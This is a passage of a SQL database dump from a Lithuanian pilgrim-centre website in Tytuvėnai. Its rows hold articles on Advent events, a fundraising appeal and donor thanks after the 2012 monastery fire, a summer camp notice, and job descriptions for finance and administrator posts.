/>Ilona Bumblauskienė iš Kražių ir Kelmės rajono literatų klubo prezidentas Viktoras Gulbinas atliko kompoziciją apie amžinąją vyro ir moters problemą – nesusikalbėjimą.<br />Seserys iš Junkilų Valerija Adomaitienė ir Ona Stankienė su savo mažaisiais padėjėjais pelnė žiūrovų simpatijas ypač už savo nostalgiškas dainas apie rudenį, lietų ir meilę.<br />Renginį vedė Tytuvėnų regioninio parko menotyrininkė N.Saimininkienė, kuri kalbėjo J.Marcinkevičiaus eilėmis.<br />Visi dalyviai buvo apdovanoti mažais suvenyrais iš akmenukų, kuriuos  pagamino Virginija ir Jurgita  Balčiūnaitės Inetos Gričiūtės rankomis.</p>\n<p>VšĮ „Tytuvėnų piligrimų centras“ informacija</p>','',1,0,0,44,'2011-11-04 18:20:10',135,'','0000-00-00 00:00:00',135,0,'0000-00-00 00:00:00','2011-11-04 18:20:10','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',1,0,197,'','',1,2336,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(103,187,'Advento sekmadieniai Tytuvėnuose','advento-sekmadieniai','','<h6>  </h6>\n<h6><img src=\"images/stories/veikla/adv_sekm_337.jpg\" border=\"0\" width=\"256\" height=\"341\" style=\"border: 0; float: left; margin-left: 15px; margin-right: 15px; margin-top: 0px; margin-bottom: 0px;\" />Adventas — ramybės, rimties ir susikaupimo metas. Tai laikas, kai žmonės, laukdami saulės sugrįžimo, tvarkosi namus, susitaiko su kaimynais, grąžina visas skolas (bent taip jau reikėtų padaryti), apvalo savo būstą ir sielą.</h6>\n<h6>Advento pradžioje pinamas advento vainikas. Toks adventinis vainikas ir buvo nupintas  pirmąjį advento sekmadienį Tytuvėnų Bernardinų vienuolyne, Tytuvėnų piligrimų centro darbuotojų. Tytuvėniškiai buvo pakviesti po Šventųjų mišių — Sumos į pirmąją popietę. Popietę vedė ir adventines giesmes giedojo Tytuvėniškė režisierė Andrėja Gričiūutė. Uždegta pirmoji adventinio vainiko žvakė. Per renginio pertraukėlę žiūrovai ir klausytojai buvo pakviest apžiūrėti Bernardinų vienuolyno antrame aukšte veikiančią Angelų parodą ir Kalėdines puokštes.</h6>\n<h6>          <img src=\"images/stories/veikla/adv_sekm_448.jpg\" border=\"0\" width=\"341\" height=\"256\" style=\"border: 0; float: right; margin-top: 0px; margin-bottom: 0px; margin-left: 15px; margin-right: 15px;\" /></h6>\n<h6>Kiekvieną advento sekmadienį rinkosi vis daugiau tytuvėniškių. Trečiąjį advento sekmadienį vedė Tytuvėnų gimnazijos mokytoja ir gimnazijos mokiniai. Svečiai iš Raseinių rajono Ariogalos miestelio literatų klubas pristatė savo adventinę programą. Paskutinįjį — ketvirtąjį sekmadienį  tytuvėniškių susirinko gausiausiai. Popietę vedė Tytuvėnų parapijos „Gyvojo Rožinio“ dalyviai. Uždegtos visos keturios Advento vainike esančios žvakės. Kiekvienas popietės dalyvis skaitė po nedidelę ištrauką iš Šventojo rašto,  uždegė po simbolinę Kristaus gimimo laukimo žvakelę, kad namuose ir širdyse būtų šviesiau ir šilčiau. Popietėje dalyvavo  Parapijos klebonas R. Žaromskis teatro, kino ir televizijos aktorė Virginija Kochanskytė.</h6>\n<p style=\"text-align: center;\"><img src=\"images/stories/veikla/adv_sekm_476.jpg\" border=\"0\" width=\"256\" height=\"341\" style=\"margin: 10px 15px; border: 0px;\" /></p>\n<h6><img src=\"images/stories/veikla/adv_sekm_298.jpg\" border=\"0\" width=\"341\" height=\"256\" style=\"border: 0; float: left; margin-top: 0px; margin-bottom: 0px; margin-left: 15px; margin-right: 15px;\" />Atrestauruotą Tytuvėnų Bernardinų vienuolyno ansamblį yra pamilę ir nuolatos lanko ne tik tytuvėniškiai, bet ir gausus būrys svečių. Šiaulių regiono „Omnitel“ firmos darbuotojai čia lankydamiesi atsisveikino su besibaigiančiais metais, apmąstydami nuveiktus darbus. Tytuvėnų Švč. Mergelės Marijos bažnyčioje išklausė Šventąsias mišias, aplankė Bernardinų vienuolyno ansamblyje veikiantį Šiaulių Vyskupijos sakralinio meno muziejų. Advento laikotarpyje čia buvo susirinkę, savo nuveiktus darbus aptarė keturios bendruomenės. Savo patirtimi dalijosi svečiai iš Raseinių rajono — Požečių bendruomenė. Mūsų rajono Mokaičių, Šedbarų ir šeimininkai — Tytuvėnų bendruomenė. Popietė buvo labai rami ir šilta. Šilumą skleidė Tytuvėnų gimnazijos moksleiviai, vadovaujami mokytojos Nijolės Astašauskienės. Dalyviai skirstėsi į namus veždamiesi kalėdaičius, kuriuos ramybės namuose ir Šv. Kūčių vakare linkėdamas, bendruomenių atstovams įteikė parapijos klebonas. Tytuvėnų piligrimų centro administracija dovanojo po maišelį kūčiukų, linkėdama ramaus Kūčių vakaro kiekvieniems namams.</h6>\n<h6>Tytuvėnų piligrimų centro administratorė</h6>','',1,0,0,44,'2012-01-04 06:14:44',135,'','2012-01-07 12:01:05',135,0,'0000-00-00 00:00:00','2012-01-04 06:14:44','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',12,0,196,'','',1,1796,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(104,188,'Nelaimė','nelaime','','<p> </p>\n<p>MIELIEJI,<br />atsitikus 2012 01 26 dienos kraupiai Tytuvėnų bernardinų vienuolyno ir bažnyčios nelaimei, kviečiame Jus prisidėti prie mūsų kultūrinio paveldo atkūrimo, išsaugojant savo ateities kartoms.</p>\n<p>VšĮ \"TYTUVĖNŲ PILIGRIMŲ CENTRAS\" <br />Įmonės kodas 301639534<br />Paramos gavėjo sąskaita (Tytuvėnų bernardinų vienuolyno atstatymui)<br />Kredito unija Kelmės taupa, kodas 50122, sąskaita Nr. LT725012200014001174<br />Tel. 8674-97392</p>\n<p>TYTUVĖNŲ ŠVČ. MERGELĖS MARIJOS PARAPIJOS paramos sąskaita (Tytuvėnų bažnyčios atstatymui)<br />Paramos gavėjo kodas 191310853<br />Swedbank, kodas 73000, sąskaita Nr. LT607300010002526602<br />Kunigas Rimantas Žaromskis<br />Tel. 8611-51976</p>\n<p><a href=\"http://www.youtube.com/watch?v=v1gHUduUQMk&amp;feature=youtu.be\" target=\"_blank\"><span style=\"color: #810081;\">http://www.youtube.com/watch?v=v1gHUduUQMk&amp;feature=youtu.be</span></a></p>','',1,0,0,44,'2012-01-30 11:25:35',135,'','2012-12-04 08:29:44',135,0,'0000-00-00 00:00:00','2012-01-30 11:25:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,195,'','',1,6270,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',38,'*',''),(105,189,'Kviečiame','kvieiame','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/kvietimas_sausio_26/kvietimas_sausio_26.jpg\" border=\"0\" width=\"200\" height=\"133\" /><br /></td>\n<td valign=\"top\">\n<p>NUOŠIRDŽIAI DĖKOJAME UŽ PARAMĄ, PAGALBĄ  TYTUVĖNŲ ŠVČ. MERGELĖS MARIJOS ANGELŲ KARALIENĖS BAŽNYČIOS IR  BERNARDINŲ VIENUOLYNO ANSAMBLIO ATSTATYMUI  IR KVIEČIAME:</p>\n<p><strong>2013 M. SAUSIO 26 D. <br />12 VAL. ŠV. MIŠIOS. <br />12.40 VAL. NUOTRAUKŲ  EKSPOZICIJOS  ,,PRISIPILDYMUI- METAI, IŠSIDALINIMUI- AKIMIRKA‘‘ PRISTATYMAS TYTUVĖNŲ BERNARDINŲ VIENUOLYNE.</strong></p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">VISAME RENGINYJE DALYVAUS IR MUS DŽIUGINS  GIESMĖMIS MIŠRUS JAUNIMO ANSAMBLIS ,, EXAUDI‘‘ MENO VADOVAS JĖZUITAS EUGENIJUS PUZYNIA S.J.<br /><br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Pagarbiai,</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">L.e.p. direktorė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Sandra Sabaliauskienė<br /><br /></p>',1,0,0,44,'2013-01-24 06:44:25',135,'','2013-01-24 06:51:32',135,0,'0000-00-00 00:00:00','2013-01-24 06:44:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,190,'','',1,4590,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',26,'*',''),(106,190,'Dėkojame už aukas','dekojame-uz-aukas','','<p> </p>\n<p>Dėkojame už aukas Tytuvėnų Švč. Mergelės Marijos parapijai ir Bernardinų vienuolyno gaisro pasekmių likvidavimui:<br />nuoširdus ačiū Reginai Karašauskytei,<br />nuoširdus ačiū Justinui Biekšai,<br />nuoširdus ačiū Laimutei Rindinienei,<br />nuoširdus ačiū Gitanai Eitutytei,<br />nuoširdus ačiū Edmundui Vilkui...</p>','',1,0,0,44,'2012-02-01 15:14:59',135,'','2012-02-01 15:25:00',135,0,'0000-00-00 00:00:00','2012-02-01 15:14:59','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,194,'','',1,5723,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',37,'*',''),(237,325,'Vasaros stovykla','vasaros-stovykla','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">DUBYSOS SLĖNIO<br />Vaikų ir jaunimo<br />vasaros stovykla</span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/vasaros_stovykla/1.jpg\" border=\"0\" alt=\"\" /><br /></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/vasaros_stovykla/2.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p> </p>',1,0,0,44,'2015-04-16 11:55:39',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2015-04-16 11:55:39','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vasaros_stovykla\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,136,'','',1,5149,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(110,194,'Konkursas vyr. finansininkės pareigoms užimti','konkursas-vyr-finansininks-pareigoms-uimti','','<p>Konkursą organizuojanti įstaiga: VšĮ „Tytuvėnų piligrimų centras“<br /><br />VšĮ „Tytuvėnų piligrimų centras“ vyr. finansininkas (-ė)<br /><br />Pareigybės aprašymas:<br /><br />VŠĮ „TYTUVĖNŲ PILIGRIMŲ CENTRAS“ VYR. FINANSININKO (-ĖS) <br />PAREIGYBĖS APRAŠYMAS <br /><br />I.    PAREIGYBĖS CHARAKTERISTIKA<br /><br />1.    Vyr. finansininkas (-ė) yra darbuotojas, dirbantis pagal darbo sutartį.<br /><br />II.    PAREIGYBĖS PASKIRTIS<br /><br />2.    Įgyvendinti VšĮ „Tytuvėnų piligrimų centras“ finansų ir apskaitos politiką, ir užtikrinti jos atitikimą šias sritis reglamentuojančių teisės aktų nuostatas.<br /><br />III.    PAREIGYBĖS VEIKLOS SRITIS<br /><br />3.    Tvarko VšĮ „Tytuvėnų piligrimų centras“ buhalterinę apskaitą ir finansavimą; vykdo įvairius projektus. Rengia sąmatų projektus, atlieka ekonominius skaičiavimus dėl lėšų poreikio. Vykdo atliekamų operacijų einamąją ir paskesniąją finansų kontrolę.<br /><br />IV.    KVALIFIKACINIAI REIKALAVIMAI<br /><br />4. Vyr. finansininkas, einantis šias pareigas, turi atitikti šiuos kvalifikacinius reikalavimus:<br />4.1. išmanyti Lietuvos Respublikos Konstituciją, Lietuvos Respublikos viešųjų įstaigų įstatymą, Lietuvos Respublikos darbo kodeksą, Lietuvos Respublikos įstatymus, Lietuvos Respublikos Vyriausybės nutarimus bei kitus teisės aktus, reglamentuojančius buhalterinę apskaitą ir finansinę atskaitomybę ir gebėti juos pritaikyti praktikoje;<br />4.2. išmanyti dokumentų tvarkymo ir apskaitos taisykles;<br />4.3. turėti aukštąjį universitetinį, aukštesnįjį arba jam prilygintą socialinių mokslų studijų srities ekonomikos, vadybos ir verslo administravimo krypties (buhalterinį) išsilavinimą ir ne mažesnę kaip 2 metų darbo patirtį buhalterinės apskaitos srityje;<br />4.4. mokėti dirbti kompiuteriu, kompiuterinėmis programomis: MS Word, MS Excel, MS Outlook, Internet Explorer, buhalterinės apskaitos programomis; <br />4.5. mokėti valdyti, savarankiškai kaupti, sisteminti, analizuoti ir apibendrinti informaciją;<br />4.6. sugebėti savarankiškai planuoti ir organizuoti savo veiklą ir rengti išvadas bei sklandžiai dėstyti mintis raštu ir žodžiu;<br />4.7. mokėti tvarkyti buhalterinę apskaitą.<br /><br />V.    VYR. FINANSININKO (-ĖS) FUNKCIJOS<br /><br />5.    Vyr. finansininkas (-ė) vykdo šias funkcijas:<br />5.1. vykdo buhalterinės apskaitos tvarkytojo ir naudojasi antrojo parašo teise;<br />5.2. inicijuoja ir(ar) vykdo sprendimus, atlikdamas einamąją ir paskesniąją finansų kontrolę;<br />5.3. kontroliuoja, kad paslaugų teikėjų pateiktos apmokėjimui sąskaitos – faktūros atitiktų paslaugų ir darbų perdavimo–priėmimo aktuose nurodytas kainas ir neviršytų Sutartyse nustatytos bendros jų sumos;<br />5.4. užtikrina atliekamų ūkinių – finansinių operacijų teisėtumą, patikrina visus šioms operacijoms atlikti būtinus dokumentus ir, jeigu dokumentai sutvarkyti netinkamai ir nėra galimybių operatyviai pašalinti šiuos trūkumus, informuoja apie tai įstaigos direktorių; <br />5.5. užtikrina, kad buhalterinės – finansinės apskaitos informacija būtų objektyvi, pateikiama laiku, išsami ir naudinga vidaus bei išorės informacijos vartotojams; <br />5.6. užtikrina visų ūkinių operacijų bei ūkinių įvykių pagrįstumą jų apskaitos dokumentais ir teisingą atvaizdavimą apskaitos registruose - kompiuterinėse laikmenose bei išspausdintuose registruose ;<br />5.7. tvarko ūkinių – finansinių operacijų dokumentus taip, kad būtų atliktas operacijas galima atsekti nuo jų sprendimo priėmimo pradžios iki vykdymo pabaigos;<br />5.8. Gautas sąskaitas – faktūras registruoja buhalterinės apskaitos registruose, rengia ir teikia paraiškas jų apmokėjimui:<br />5.9. kontroliuoja, kad biudžeto lėšos būtų naudojamos patvirtintų išlaidų sąmatų ribose ir teisingai priskiriamos valstybės biudžeto išlaidų ekonominės klasifikacijos kodams. <br />5.10. rengia ir teikia Savivaldybei biudžeto išlaidų sąmatos įvykdymo ataskaitas;<br />5.11. vykdo finansinių ir ūkinių operacijų einamąją ir paskesniąją finansų kontrolę, užtikrina teisingą apskaitos dokumentų įforminimą;<br />5.12. vykdo įstaigos ilgalaikio materialiojo ir nematerialiojo turto apskaitą, organizuoja turto inventorizavimą, inicijuoja turto nuvertėjimo nustatymą pagal VSAFAS reikalavimus, skaičiuoja jo nusidėvėjimą;<br />5.13. tvarko įstaigos turimų atsargų apskaitą, kuro bei kitas išlaidas, kontroliuoja jų judėjimą, vykdo sunaudotų atsargų bei kuro nurašymą pagal materialiai atsakingų asmenų pateiktus atsargų bei kuro nurašymo aktus. <br />5.14. vykdo atsiskaitymų su įstaigos materialiai atsakingais asmenimis apskaitą ir kontroliuoja, kad laiku būtu atsiskaitoma;<br />5.15. tvarko sąskaitas banke, vykdo įstaigos vadovo pavestas atlikti atsiskaitymų operacijas per banko sąskaitas ir kontroliuoja šių lėšų judėjimą; tikrina gautas įplaukas, išlaidas bei likučius su apskaitos registrų duomenimis. Kiekvieno mėnesio paskutinę darbo dieną sutikrina banko sąskaitų likučius su apskaitos duomenimis, išspausdina sąskaitų registrus ir pasirašo;<br />5.16. atlieka ekonominius skaičiavimus dėl lėšų poreikio, planuoja lėšas įstaigos vykdomoms programoms finansuoti; <br />5.17. teikia siūlymus įstaigos vadovui buhalterinės apskaitos automatizavimo tobulinimui; <br />5.18. užtikrina tinkamą finansinių – buhalterinių dokumentų įforminimą, saugojimą ir perdavimą archyvui;<br />5.19. atlieka kitas su buhalterinės apskaitos bei finansų tvarkymu susijusias funkcijas.<br /><br />VI. VYR. FINANSININKO (-ĖS) PAREIGAS EINANČIO DARBUOTOJO (-OS) PAVALDUMAS<br /><br />6. Vyr. finansininko (-ės) pareigas einantis darbuotojas (-a) tiesiogiai pavaldus įstaigos direktoriui ir asmeniškai atsako už tinkamą pareigybės aprašyme nustatytų funkcijų atlikimą bei savalaikį pavedamų užduočių įvykdymą, einamąją ir paskesniąją finansų kontrolę, buhalterinių įrašų teisingumą.<br /><br />Dokumentai priimami: iki 2012-09-11 dienos imtinai  VšĮ „Tytuvėnų piligrimų centre“, Maironio g. 1, 86486 Tytuvėnai, Kelmės r. <br />Išsamesnė informacija apie konkursą: 8 427 56223, 8 61558486 l.e. direktorės pareigas Sandra Sabaliauskienė.<br /><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:HyphenationZone>19</w:HyphenationZone> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState=\"false\" LatentStyleCount=\"156\"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]>\n<style>\n /* Style Definitions */\n table.MsoNormalTable\n	{mso-style-name:\"Įprastoji lentelė\";\n	mso-tstyle-rowband-size:0;\n	mso-tstyle-colband-size:0;\n	mso-style-noshow:yes;\n	mso-style-parent:\"\";\n	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;\n	mso-para-margin:0cm;\n	mso-para-margin-bottom:.0001pt;\n	mso-pagination:widow-orphan;\n	font-size:10.0pt;\n	font-family:\"Times New Roman\";\n	mso-ansi-language:#0400;\n	mso-fareast-language:#0400;\n	mso-bidi-language:#0400;}\n</style>\n<![endif]--></p>\n<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:HyphenationZone>19</w:HyphenationZone> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState=\"false\" LatentStyleCount=\"156\"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]>\n<style>\n /* Style Definitions */\n table.MsoNormalTable\n	{mso-style-name:\"Įprastoji lentelė\";\n	mso-tstyle-rowband-size:0;\n	mso-tstyle-colband-size:0;\n	mso-style-noshow:yes;\n	mso-style-parent:\"\";\n	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;\n	mso-para-margin:0cm;\n	mso-para-margin-bottom:.0001pt;\n	mso-pagination:widow-orphan;\n	font-size:10.0pt;\n	font-family:\"Times New Roman\";\n	mso-ansi-language:#0400;\n	mso-fareast-language:#0400;\n	mso-bidi-language:#0400;}\n</style>\n<![endif]-->\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">Asmenys, pageidaujantys dalyvauti konkurse, privalo pateikti konkursą organizuojančiai įstaigai šiuos dokumentus:</span></p>\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">1. Prašymą dalyvauti konkurse;</span></p>\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">2. Asmens tapatybę patvirtinantį dokumentą: </span></p>\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">3. Išsilavinimą patvirtinantį dokumentą ir šių dokumentų kopijas;</span></p>\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">4. Gyvenimo aprašymą.</span></p>\n<p class=\"MsoNormal\"><span style=\"font-size: 9.0pt;\">5. Darbo patirtį (stažą) patvirtinančius dokumentus.</span></p>\n<p> </p>','',-2,0,0,44,'2012-07-02 06:40:03',135,'','2012-08-29 08:42:28',135,0,'0000-00-00 00:00:00','2012-07-02 06:40:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',4,0,133,'','',1,119,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',33,'*',''),(111,195,'Konkursas administratoriaus (-ės) pareigoms užimti','konkursas-administratoriaus-s-pareigoms-uimti','','<p>Konkursą organizuojanti įstaiga: VšĮ „Tytuvėnų piligrimų centras“<br /><br />VšĮ „Tytuvėnų piligrimų centras“ administratoriaus (-ės)<br /><br />Pareigybės aprašymas:<br /><br />VŠĮ „TYTUVĖNŲ PILIGRIMŲ CENTRAS“ ADMINISTRATORIAUS (-ĖS) <br />PAREIGYBĖS APRAŠYMAS <br /><br />I.    PAREIGYBĖS CHARAKTERISTIKA<br /><br />1.    Administratorius (-ė) yra darbuotojas, dirbantis pagal darbo sutartį.<br /><br />II.    PAREIGYBĖS VEIKLOS SRITIS<br /><br />2.    Registruoja VšĮ „Tytuvėnų piligrimų centras“ gaunamus ir siunčiamus raštus, tvarko ir priima korespondenciją, bei pateikia įmonės vadovui, registruoja lankytojus, rengia įsakymus, priima ir teikia informaciją telefonu, saugo dokumentus ir juos archyvuoja, vykdo įstatymais ir kitais teisės aktais pavestas įmonės funkcijas viešųjų pirkimų srityje.<br /><br />III.    KVALIFIKACINIAI REIKALAVIMAI<br /><br />3. Administratorius (-ė), einantis šias pareigas, turi atitikti šiuos kvalifikacinius reikalavimus:<br />3.1. išmanyti Lietuvos Respublikos Konstituciją, Lietuvos Respublikos viešųjų įstaigų įstatymą, Lietuvos Respublikos darbo kodeksą, Lietuvos Respublikos įstatymus, Lietuvos Respublikos paslaugų organizavimą, priežiūrą ir kontrolę bei gebėti juos pritaikyti praktikoje;<br />3.2. išmanyti raštvedybos ir dokumentų tvarkymo taisykles;<br />3.3. turėti 